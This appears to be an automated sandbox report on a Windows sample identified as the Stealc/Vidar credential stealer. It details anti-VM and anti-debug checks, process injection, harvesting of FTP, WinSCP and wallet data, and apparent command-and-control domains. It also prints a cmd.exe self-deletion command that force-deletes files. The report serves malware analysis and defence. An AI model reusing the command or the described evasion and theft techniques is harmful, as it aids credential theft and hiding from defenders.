etProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00098950

Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_000AF142 push ecx; ret	0_2_000AF155
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_000A2D3B push esi; ret	0_2_000A2D3D
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_0009DDB5 push ecx; ret	0_2_0009DDC8

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\noll.exe	Process created: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\noll.exe" & rd /s /q "C:\ProgramData\HJDHCFCBGIDG" & exit
Source: C:\Users\user\Desktop\noll.exe	Process created: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\noll.exe" & rd /s /q "C:\ProgramData\HJDHCFCBGIDG" & exit			Jump to behavior

Source: C:\Users\user\Desktop\noll.exe

0_2_00098950

Source: C:\Users\user\Desktop\noll.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\noll.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: noll.exe, type: SAMPLE
Source: Yara match	File source: 0.0.noll.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.noll.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: noll.exe PID: 3636, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: noll.exe	Binary or memory string: DIR_WATCH.DLL
Source: noll.exe	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: noll.exe	Binary or memory string: SBIEDLL.DLL
Source: noll.exe	Binary or memory string: API_LOG.DLL

Source: C:\Users\user\Desktop\noll.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

0_2_0008180D

Source: C:\Windows\SysWOW64\timeout.exe TID: 4796

Thread sleep count: 86 > 30

Jump to behavior

Source: C:\Users\user\Desktop\noll.exe

Code function: 0_2_00090DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00090EEEh

0_2_00090DDB

Source: C:\Users\user\Desktop\noll.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_0008B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0008B93F
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_00095B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_00095B0B
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_0009543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_0009543D
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_00094CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	0_2_00094CC8
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_00089D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00089D1C
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_0008CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0008CD37
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_00081D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00081D80
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_0008D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0008D5C6
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_0008B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0008B5DF
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_0008BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0008BF4D
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_00095FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00095FD1

Source: C:\Users\user\Desktop\noll.exe

Code function: 0_2_00095142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

0_2_00095142

Source: C:\Users\user\Desktop\noll.exe

Code function: 0_2_00090FBA GetSystemInfo,wsprintfA,

0_2_00090FBA

Source: noll.exe, 00000000.00000003.2305868410.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305868410.0000000002E04000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwarem

Source: C:\Users\user\Desktop\noll.exe	API call chain: ExitProcess graph end node	graph_0-20913
Source: C:\Users\user\Desktop\noll.exe	API call chain: ExitProcess graph end node	graph_0-20898
Source: C:\Users\user\Desktop\noll.exe	API call chain: ExitProcess graph end node	graph_0-22230

Source: C:\Users\user\Desktop\noll.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\noll.exe

Code function: 0_2_0009D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0009D016

Source: C:\Users\user\Desktop\noll.exe

0_2_00098950

Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_000814AD mov eax, dword ptr fs:[00000030h]	0_2_000814AD
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_0008148A mov eax, dword ptr fs:[00000030h]	0_2_0008148A
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_000814A2 mov eax, dword ptr fs:[00000030h]	0_2_000814A2
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_00098599 mov eax, dword ptr fs:[00000030h]	0_2_00098599
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_0009859A mov eax, dword ptr fs:[00000030h]	0_2_0009859A

Source: C:\Users\user\Desktop\noll.exe

0_2_00091807

Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_0009D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0009D016
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_0009D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0009D98C
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_000A762E SetUnhandledExceptionFilter,	0_2_000A762E

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: noll.exe PID: 3636, type: MEMORYSTR

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\noll.exe

Code function: 0_2_0008F54A _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,

0_2_0008F54A

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_0009257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_0009257F
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_000924A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_000924A8

Source: C:\Users\user\Desktop\noll.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\noll.exe" & rd /s /q "C:\ProgramData\HJDHCFCBGIDG" & exit			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10			Jump to behavior

Source: C:\Users\user\Desktop\noll.exe

Code function: 0_2_0008111D cpuid

0_2_0008111D

Source: C:\Users\user\Desktop\noll.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	0_2_00090DDB
Source: C:\Users\user\Desktop\noll.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_000AB0CC
Source: C:\Users\user\Desktop\noll.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_000AB1C1
Source: C:\Users\user\Desktop\noll.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_000A9A50
Source: C:\Users\user\Desktop\noll.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_000AB268
Source: C:\Users\user\Desktop\noll.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_000AB2C3
Source: C:\Users\user\Desktop\noll.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_000AAB40
Source: C:\Users\user\Desktop\noll.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	0_2_000A53E3
Source: C:\Users\user\Desktop\noll.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	0_2_000A749C
Source: C:\Users\user\Desktop\noll.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_000AB494
Source: C:\Users\user\Desktop\noll.exe	Code function: EnumSystemLocalesA,	0_2_000AB556
Source: C:\Users\user\Desktop\noll.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_000A9D6E
Source: C:\Users\user\Desktop\noll.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	0_2_000AE56F
Source: C:\Users\user\Desktop\noll.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_000A7576
Source: C:\Users\user\Desktop\noll.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_000AB580
Source: C:\Users\user\Desktop\noll.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_000A8DC4
Source: C:\Users\user\Desktop\noll.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_000AB5E7
Source: C:\Users\user\Desktop\noll.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_000AB623
Source: C:\Users\user\Desktop\noll.exe	Code function: GetLocaleInfoA,	0_2_000AE6A4

Source: C:\Users\user\Desktop\noll.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\noll.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\noll.exe

Code function: 0_2_0009C0E9 lstrcpyA,GetLocalTime,SystemTimeToFileTime,

0_2_0009C0E9

Source: C:\Users\user\Desktop\noll.exe

Code function: 0_2_00090C53 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_00090C53

Source: C:\Users\user\Desktop\noll.exe

Code function: 0_2_00090D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_00090D2E

Source: C:\Users\user\Desktop\noll.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: noll.exe, 00000000.00000002.2315238469.0000000002E17000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\noll.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: noll.exe, type: SAMPLE
Source: Yara match	File source: 0.0.noll.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.noll.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: noll.exe PID: 3636, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: noll.exe, type: SAMPLE
Source: Yara match	File source: 0.0.noll.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.noll.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: noll.exe PID: 3636, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\noll.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\noll.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: noll.exe, type: SAMPLE
Source: Yara match	File source: 0.0.noll.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.noll.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: noll.exe PID: 3636, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: noll.exe, type: SAMPLE
Source: Yara match	File source: 0.0.noll.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.noll.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: noll.exe PID: 3636, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	211 Process Injection	3 Obfuscated Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 File Deletion	NTDS	55 System Information Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Virtualization/Sandbox Evasion	Cached Domain Credentials	151 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	211 Process Injection	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	12 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
noll.exe	82%	ReversingLabs	Win32.Backdoor.Multiverze
noll.exe	100%	Avira	TR/Redcap.paoab
noll.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://cowod.hoptoref=	0%	Avira URL Cloud	safe
http://cowod.=cloudflare	0%	Avira URL Cloud	safe
http://cowod.hopto.ef=	0%	Avira URL Cloud	safe
http://cowod.hopto.orglass=	0%	Avira URL Cloud	safe
http://cowod.hoptoml	0%	Avira URL Cloud	safe
http://cowod.hopto.flare	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	23.55.153.106	true	false	high
t.me	149.154.167.99	true	false	high
cowod.hopto.org	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://t.me/ae5ed	false		high
https://steamcommunity.com/profiles/76561199780418869	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&l=english&am	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://player.vimeo.com	noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=engli	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://steamcommunity.com/profiles/76561199780418869I	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305868410.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
http://cowod.hopto.org	noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	false		high
https://store.steampowered.com/subscriber_agreement/	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://www.gstatic.cn/recaptcha/	noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://telegram.org/img/t_logo_2x.png	noll.exe, 00000000.00000002.2315238469.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp	false		high
